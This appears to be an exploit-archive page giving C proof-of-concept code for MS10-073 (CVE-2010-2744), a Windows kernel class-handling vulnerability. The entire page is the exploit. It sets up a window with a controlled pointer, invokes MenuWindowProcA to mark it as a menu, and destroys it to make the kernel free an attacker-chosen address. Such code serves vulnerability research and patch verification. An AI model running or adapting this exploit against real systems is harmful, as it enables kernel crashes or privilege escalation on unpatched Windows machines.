ExploitFixes
MS10-073 Windows Class Handling Vulnerability - [CVE: 2010-2744] 2011-01-02 14:15:11

#include <windows.h>

/*
Source:
http://mista.nu/blog/2010/12/01/windows-class-handling-gone-wrong/
*/

int main(int argc, char **argv)
{
WNDCLASSA Class = {0};
CREATESTRUCTA Cs = {0};
FARPROC MenuWindowProcA;
HMODULE hModule;
HWND hWindow;

Class.lpfnWndProc = DefWindowProc;
Class.lpszClassName = "Class";
Class.cbWndExtra = sizeof(PVOID);

RegisterClassA(&Class);

hModule = LoadLibraryA("USER32.DLL");

MenuWindowProcA = GetProcAddress(hModule,"MenuWindowProcA");

hWindow = CreateWindowA("Class","Window",0,0,0,32,32,NULL,NULL,NULL,NULL);

// set the pointer value of the (soon to be) popup menu structure
SetWindowLongPtr(hWindow,0,(LONG_PTR)0x80808080);

// set WND->fnid = FNID_MENU
MenuWindowProcA(hWindow,0,WM_NCCREATE,(WPARAM)0,(LPARAM)&Cs);

// trigger -> ExPoolFree(0x80808080)
DestroyWindow(hWindow);

return 0;
}